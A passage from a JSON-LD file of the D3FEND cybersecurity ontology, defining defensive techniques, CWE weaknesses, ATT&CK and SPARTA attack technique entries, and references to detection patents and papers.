    },
    {
      "@id": "d3f:VideoSurveillance",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:VideoSurveillance"
      ],
      "d3f:d3fend-id": "D3-VS",
      "d3f:definition": "Monitoring of physical areas via camera video feeds to deter, detect, and investigate unauthorized access and related security events.",
      "d3f:kb-article": "## How it works\n\nVideo surveillance uses digital cameras that stream to a video management system (VMS) or network video recorder (NVR) for live monitoring, recording, and retrieval. Recording can be continuous or event-driven using analytics (motion in regions of interest, line crossing) or external triggers (access denials, sensor alarms). Time synchronization aligns video with other logs, while health monitoring detects camera outages and tamper. Secure export workflows preserve integrity for investigations.\n\n## Considerations\n\n* Plan camera placement and coverage to avoid occlusions and handle challenging lighting; select lenses and mounting to capture entry points and critical areas.\n* Size storage and bandwidth for the intended retention period by choosing appropriate resolution, frame rate, and compression, and monitor capacity over time.\n* Secure cameras and management systems with unique credentials, timely firmware updates, encrypted transport, and network segmentation to limit exposure.\n* Address privacy and legal obligations with visible notice, role-based access to footage, and retention policies aligned with regulations and organizational policy.\n* Monitor system health and build resilience with tamper and heartbeat alerts, recorder failover where needed, and accurate time synchronization for correlation.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DHS-CCTV-Technology-Handbook"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
        },
        {
          "@id": "d3f:Reference-ONVIF-ProfileS"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:DigitalCamera"
      },
      "d3f:synonym": [
        "CCTV Surveillance",
        "Video Monitoring"
      ],
      "rdfs:label": "Video Surveillance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:N5cf71bdf63d04e5883484a37b2ad2794"
        }
      ]
    },
    {
      "@id": "_:N5cf71bdf63d04e5883484a37b2ad2794",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalCamera"
      }
    },
    {
      "@id": "d3f:CWE-1267",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1267",
      "d3f:definition": "The product uses an obsolete encoding mechanism to implement access controls.",
      "rdfs:label": "Policy Uses Obsolete Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:EX-0017.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0017.01",
      "d3f:definition": "A direct-ascent ASAT is often the most commonly thought of threat to space assets. It typically involves a medium- or long-range missile launching from the Earth to damage or destroy a satellite in orbit. This form of attack is often easily attributed due to the missile launch which can be easily detected. Due to the physical nature of the attacks, they are irreversible and provide the attacker with near real-time confirmation of success. Direct-ascent ASATs create orbital debris which can be harmful to other objects in orbit. Lower altitudes allow for more debris to burn up in the atmosphere, while attacks at higher altitudes result in more debris remaining in orbit, potentially damaging other spacecraft in orbit.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "Direct Ascent ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0017/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0017"
      },
      "skos:prefLabel": "Direct Ascent ASAT"
    },
    {
      "@id": "d3f:CWE-329",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-329",
      "d3f:definition": "The product generates and uses a predictable Initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.",
      "rdfs:label": "Generation of Predictable IV with CBC Mode",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1204"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:T1076",
      "@type": "owl:Class",
      "d3f:attack-id": "T1076",
      "d3f:definition": "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1021.001",
      "rdfs:label": "Remote Desktop Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1021.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProcessHollowingDetection_CarbonBlackInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170272462A1"
      },
      "d3f:kb-abstract": "A method and system for remediating a process hollowing intrusion on a user device comprising detecting a process starting on the user device, preparing the process to monitor Application Programming Interface (API) calls between the process and an operating system of the user device, determining whether the process is associated with a process hollowing intrusion based on information associated with the process and/or the API calls, and executing security policies against the process associated with the process hollowing intrusion. In examples, it is determined whether the child process is associated with a process hollowing intrusion in response to determining whether one or more API calls associated with known process hollowing intrusions modify executable memory of and/or modify an entry point address of the child process.",
      "d3f:kb-author": "Jeffrey Albin Kraemer, Paul Matthew Drapeau",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Carbon Black Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSelf-ModificationDetection"
      },
      "d3f:kb-reference-title": "System and Method for Process Hollowing Detection",
      "rdfs:label": "Reference - System and Method for Process Hollowing Detection - Carbon Black Inc"
    },
    {
      "@id": "d3f:HardwareClockDeviceDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device driver for a hardware clock.",
      "d3f:drives": {
        "@id": "d3f:HardwareClock"
      },
      "rdfs:label": "Hardware Clock Device Driver",
      "rdfs:seeAlso": {
        "@id": "https://docs.kernel.org/admin-guide/rtc.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "_:Nb40e0b7827d54d7481276865c0f8e9e6"
        }
      ]
    },
    {
      "@id": "_:Nb40e0b7827d54d7481276865c0f8e9e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:Reference-ReachabilityGraphBasedSafeRemediationsforSecuirytofOnPremiseAndCloudComputingEnvironments",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/23/c1/a5/d78b3d4f275070/US11637861.pdf"
      },
      "d3f:kb-abstract": "A method for securing a networked computer system executing an application includes identifying a vulnerable computer resource in the networked computer system, determining all computer resources in the networked computer system that are accessible from, or are accessed by, the vulnerable computer resource, and prioritizing implementation of a remediation action to secure the vulnerable computer resource if a vulnerability path extends from the vulnerable computer resource to a critical computer resource that contains sensitive information. The remediation action to secure the vulnerable computer resource is a safe remediation action that does not impact availability of the application executing on the networked computer system.",
      "d3f:kb-author": "Siddharth Sukumar Burle, Ajoy Kumar, Manish Jain",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkVulnerabilityAssessment"
      },
      "d3f:kb-reference-title": "Reachability graph-based safe remediations for security of on-premise and cloud computing environments",
      "rdfs:label": "Reference - Reachability graph-based safe remediations for security of on-premise and cloud computing environments"
    },
    {
      "@id": "d3f:Reference-DetectionOfMaliciousIDNHomoglyphDomains",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://essay.utwente.nl/79263/1/Yazdani_MA_EEMCS.pdf"
      },
      "d3f:kb-abstract": "At early stages of Internet development, users were only able to register or access domains with ASCII characters. The introduction of IDN (Internationalized Domain Name) which uses the larger Unicode character set, made it possible for regional users to deal with domain names using their local language alphabet. Beside the advantages provided by IDN, a new type of network threats has also emerged. The reason behind this is that there are many similar-looking characters in Unicode system, called homoglyphs. These characters could be used by an attacker to lure users by replacing one or more characters of a benign domain.",
      "d3f:kb-author": "Ramin Yazdani",
      "d3f:kb-organization": "University of Twente",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDenylisting"
      },
      "d3f:kb-reference-title": "Detection of Malicious IDN Homoglyph Domains Using Active DNS Measurements",
      "rdfs:label": "Reference - Detection of Malicious IDN Homoglyph Domains"
    },
    {
      "@id": "d3f:BusinessCommunicationPlatformClient",
      "@type": "owl:Class",
      "d3f:definition": "Client software to enable the process of sharing information between employees within and outside a company.  Business communication encompasses topics such as marketing, brand management, customer relations, consumer behavior, advertising, public relations, corporate communication, community engagement, reputation management, interpersonal communication, employee engagement, and event management. It is closely related to the fields of professional communication and technical communication.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Business_communication"
      },
      "rdfs:label": "Business Communication Platform Client",
      "rdfs:subClassOf": {
        "@id": "d3f:CollaborativeSoftware"
      }
    },
    {
      "@id": "d3f:OTStopCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a device to stop a service/program.",
      "rdfs:label": "OT Stop Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:N249f0584bc0c4ec0a12ea2c899b9cb23"
        },
        {
          "@id": "_:N35c7b83c968947beb23bf6ce8242965d"
        },
        {
          "@id": "_:Ne5c037f8e16846b0bbc0b776ffe1a2d9"
        }
      ]
    },
    {
      "@id": "_:N249f0584bc0c4ec0a12ea2c899b9cb23",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N35c7b83c968947beb23bf6ce8242965d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTStopCommand"
      }
    },
    {
      "@id": "_:Ne5c037f8e16846b0bbc0b776ffe1a2d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommandEvent"
      }
    },
    {
      "@id": "d3f:T1432",
      "@type": "owl:Class",
      "d3f:attack-id": "T1432",
      "d3f:definition": "An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.003",
      "rdfs:label": "Access Contact List - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Access Contact List"
    },
    {
      "@id": "d3f:Reference-IntroductoryComputerForensics",
      "@type": [
        "owl:NamedIndividual",
        "d3f:BookReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://core.ac.uk/download/pdf/326762883.pdf"
      },
      "d3f:kb-author": "Xiaodong Lin",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileMetadataValueVerification"
      },
      "d3f:kb-reference-title": "Introductory Computer Forensics",
      "rdfs:label": "Reference - Introductory Computer Forensics"
    },
    {
      "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ibm.com/docs/en/taddm/7.3.0?topic=model-dependencies-between-resources"
      },
      "d3f:kb-organization": "IBM",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DataExchangeMapping"
        },
        {
          "@id": "d3f:ServiceDependencyMapping"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        }
      ],
      "d3f:kb-reference-title": "Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources",
      "rdfs:label": "Reference - Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources"
    },
    {
      "@id": "d3f:T1559",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1559",
      "d3f:definition": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occur when processes are stuck in a cyclic waiting pattern.",
      "d3f:injects": {
        "@id": "d3f:InterprocessCommunication"
      },
      "rdfs:label": "Inter-Process Communication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N118b555a8d854c8ba55face49d0b3543"
        }
      ]
    },
    {
      "@id": "_:N118b555a8d854c8ba55face49d0b3543",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:injects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InterprocessCommunication"
      }
    },
    {
      "@id": "d3f:CWE-115",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-115",
      "d3f:definition": "The product misinterprets an input, whether from an attacker or another product, in a security-relevant fashion.",
      "rdfs:label": "Misinterpretation of Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:CWE-293",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-293",
      "d3f:definition": "The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking.",
      "d3f:synonym": "referrer",
      "rdfs:label": "Using Referer Field for Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-290"
      }
    },
    {
      "@id": "d3f:LocalResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:LocalResource"
      },
      "d3f:definition": "Ephemeral digital artifact comprising a request of a local resource and any response from that resource.",
      "rdfs:label": "Local Resource Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ResourceAccess"
        },
        {
          "@id": "_:N24a09ad33ed84cc58aeb1e62dc600124"
        }
      ],
      "skos:altLabel": "Endpoint Resource Access"
    },
    {
      "@id": "_:N24a09ad33ed84cc58aeb1e62dc600124",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalResource"
      }
    },
    {
      "@id": "d3f:T1630",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630",
      "d3f:definition": "Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.",
      "rdfs:label": "Indicator Removal on Host - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Indicator Removal on Host"
    },
    {
      "@id": "d3f:DS0020",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments",
      "d3f:exactly": {
        "@id": "d3f:VolumeSnapshot"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Volume Metadata component",
      "rdfs:label": "Snapshot (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1550.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:SessionCookie"
      },
      "d3f:attack-id": "T1550.004",
      "d3f:definition": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)",
      "d3f:produces": {
        "@id": "d3f:WebNetworkTraffic"
      },
      "rdfs:label": "Web Session Cookie",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:Nf3c3e8ce44ad47f681594cc8fd1f8855"
        },
        {
          "@id": "_:Nda3fb74d5e8347e8868ab34efc1c0921"
        }
      ]
    },
    {
      "@id": "_:Nf3c3e8ce44ad47f681594cc8fd1f8855",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "_:Nda3fb74d5e8347e8868ab34efc1c0921",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1535",
      "@type": "owl:Class",
      "d3f:attack-id": "T1535",
      "d3f:definition": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.",
      "rdfs:label": "Unused/Unsupported Cloud Regions",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1495",
      "@type": "owl:Class",
      "d3f:attack-id": "T1495",
      "d3f:definition": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.",
      "rdfs:label": "Firmware Corruption",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1070.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.008",
      "d3f:definition": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.",
      "rdfs:label": "Clear Mailbox Data",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:CWE-1060",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1060",
      "d3f:definition": "The product performs too many data queries without using efficient data processing functionality such as stored procedures.",
      "rdfs:label": "Excessive Number of Inefficient Server-Side Data Accesses",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1216.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1216.002",
      "d3f:definition": "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)",
      "rdfs:label": "SyncAppvPublishingServer",
      "rdfs:subClassOf": {
        "@id": "d3f:T1216"
      }
    },
    {
      "@id": "d3f:Reference-SNMPNetworkAutoDiscovery",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.device42.com/auto-discovery/network-auto-discovery/"
      },
      "d3f:kb-abstract": "SNMP, or Simple Network Management Protocol, is a protocol and a standard that is supported by just about any managed network-connected hardware. There are three widely deployed versions: SNMP v1, v2c (most commonly used), and v3. SNMP is typically utilized read-only, but supports read/write, and by default utilizes port 161. SNMP exposes management data in the form of ‘variables’, which are organized in what is known as a MIB, or “Management Information Base”. A MIB essentially describes the variables available on a given system, each of which can be remotely queried via SNMP.",
      "d3f:kb-organization": "Device 42",
      "d3f:kb-reference-of": {
        "@id": "d3f:ActiveLogicalLinkMapping"
      },
      "d3f:kb-reference-title": "SNMP - Network Auto Discovery",
      "rdfs:label": "Reference - SNMP - Network Auto-Discovery"
    },
    {
      "@id": "d3f:T1598.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.002",
      "d3f:definition": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
      "rdfs:label": "Spearphishing Attachment",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:CWE-54",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-54",
      "d3f:definition": "The product accepts path input in the form of trailing backslash ('filedir\\') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filedir\\' (Trailing Backslash)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:MemoryProtectionUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Memory Protection Unit (MPU) is a processor component that enforces access control policies on memory regions to ensure the integrity, security, and proper operation of a computing system.",
      "d3f:synonym": "MPU",
      "rdfs:label": "Memory Protection Unit",
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessorComponent"
      }
    },
    {
      "@id": "d3f:CWE-1322",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1322",
      "d3f:definition": "The product uses a non-blocking model that relies on a single threaded process for features such as scalability, but it contains code that can block when it is invoked.",
      "rdfs:label": "Use of Blocking Code in Single-threaded, Non-blocking Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-834"
      }
    },
    {
      "@id": "d3f:MemoryManagementUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:TranslationLookasideBuffer"
      },
      "d3f:creates": {
        "@id": "d3f:VirtualAddress"
      },
      "d3f:definition": "A computer’s memory management unit (MMU) is the physical hardware that handles its virtual memory and caching operations. The MMU is usually located within the computer’s central processing unit (CPU), but sometimes operates in a separate integrated chip (IC).",
      "d3f:manages": [
        {
          "@id": "d3f:PageTable"
        },
        {
          "@id": "d3f:Storage"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://www.techopedia.com/definition/4768/memory-management-unit-mmu"
      },
      "rdfs:label": "Memory Management Unit",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Memory_management_unit"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessorComponent"
        },
        {
          "@id": "_:N651e082fed7f44c28887eb4db2454a4d"
        },
        {
          "@id": "_:N94c64d8998854a6c90e22c8c978759f0"
        },
        {
          "@id": "_:N0ae3f9eef2f74476b92381dea13bd5d3"
        },
        {
          "@id": "_:N4ade58f11ebd46108898fb386f51b68e"
        }
      ]
    },
    {
      "@id": "_:N651e082fed7f44c28887eb4db2454a4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TranslationLookasideBuffer"
      }
    },
    {
      "@id": "_:N94c64d8998854a6c90e22c8c978759f0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualAddress"
      }
    },
    {
      "@id": "_:N0ae3f9eef2f74476b92381dea13bd5d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PageTable"
      }
    },
    {
      "@id": "_:N4ade58f11ebd46108898fb386f51b68e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:TimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a timer artifact, characterized by the initiation, expiration, modification, or cancellation of a countdown or interval-based temporal mechanism.",
      "rdfs:label": "Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N2de45ef99fc346b89987d848b580ea6e"
        }
      ]
    },
    {
      "@id": "_:N2de45ef99fc346b89987d848b580ea6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Timer"
      }
    },
    {
      "@id": "d3f:ParentProcess",
      "@type": "owl:Class",
      "d3f:definition": "In computing, a parent process is a process that has created one or more child processes.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Parent_process"
      },
      "rdfs:label": "Parent Process",
      "rdfs:seeAlso": {
        "@id": "dbr:Child_process"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:Reference-NearMemoryInMemoryDetectionofFilelessMalware",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.inf.ufpr.br/mazalves/wp-content/uploads/sites/13/2021/03/memsys2020.pdf"
      },
      "d3f:kb-abstract": "Fileless malware are recent threats to computer systems that load directly into memory, and whose aim is to prevent anti-viruses (AVs) from successfully matching byte patterns against suspicious files written on disk. Their detection requires that software-based AVs continuously scan memory, which is expensive due to repeated locks and polls. However, research advances introduced near-memory and in-memory processing, which allow memory controllers to trigger basic computations without moving data to the CPU. In this paper, we address AVs performance overhead by moving them to the hardware, i.e., we propose instrumenting processors’ memory controller or smart memories (near- and in-memory malware detection, respectively) to accelerate memory scanning procedures. To do so, we present MINI-ME, the Malware Identification based on Near- and In-Memory Evaluation mechanism, a hardware-based AV accelerator that interrupts the program’s execution if malicious patterns are discovered in their memory. We prototyped MINI-ME in a simulator and tested it with a set of 21 thousand in-the-wild malware samples, which resulted in multiple signatures matching with less than 1% of performance overhead and rates of 100% detection, and zero false-positives and false-negatives.",
      "d3f:kb-author": "Marcus Botacin, André Grégio, Marco Antonio Zanata Alves",
      "d3f:kb-reference-of": {
        "@id": "d3f:HostShutdown"
      },
      "d3f:kb-reference-title": "Near-Memory & In-Memory Detection of Fileless Malware",
      "rdfs:label": "Reference - Near-Memory & In-Memory Detection of Fileless Malware"
    },
    {
      "@id": "d3f:exactly",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x exactly y: The entity x is identical to or fully corresponds to entity y.",
      "rdfs:label": "exactly",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:RegOpenKeyTransactedW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyTransactedW"
    },
    {
      "@id": "d3f:NetworkTrafficSignatureAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficSignatureAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-NTSA",
      "d3f:definition": "Analyzing network traffic and comparing it to known signatures.",
      "d3f:kb-article": "## How it works\n\nNetwork signature analysis relies on predefined patterns, or signatures, to identify malicious network activity. These signatures typically match against specific byte sequences, packet header information, or protocol anomalies indicative of known threats.\n\nThe process works as follows:\n\n* Packet Capture: Network traffic is captured on an interface or port, resulting in a stream of raw packets.\n* Preprocessing: The captured packets are preprocessed, cleaning and normalizing the data for efficient analysis.\n* Signature Matching: Each packet is compared against a database of signatures using dedicated engines.\n\n## Considerations\n\n### False Negatives\n\nNetwork signature analysis is susceptible to generating false negatives. These occur when malicious activity evades detection due to limitations in the signature-based approach. Here are some common causes:\n\n* Evolving threats: Attackers frequently modify their tactics, rendering existing signatures ineffective against new variants.\n* Obfuscation: Attackers may disguise malicious content using encryption, encoding, or other techniques to bypass signature detection.\n* Limited visibility: Signatures rely on specific patterns. If crucial information is encrypted or hidden, the signature might miss the threat.\n* Zero-day attacks: By definition, new and unknown attacks lack corresponding signatures, allowing them to pass undetected.\n\n### False Positives\n\nNetwork signature analysis is susceptible to generating false positives. These occur when the signature analysis triggers an alert for benign traffic. Common causes include:\n\n* Overly broad signatures: Rules designed to be too general might match harmless activities, generating false alarms.\n* Network misconfigurations: Improperly configured devices or legitimate network activity can mimic malicious patterns, triggering false positives.\n* Data errors: Corrupted or incomplete network data can lead to misinterpretations and false alerts.\n\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForStrategicAntiMalwareMonitoring"
      },
      "rdfs:label": "Network Traffic Signature Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N90fe1ab01be944cb9122081c2a5fc33c"
        }
      ]
    },
    {
      "@id": "_:N90fe1ab01be944cb9122081c2a5fc33c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-3_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Risk Assessment | Predictive Cyber Analytics",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "d3f:MessageAnalysis"
        },
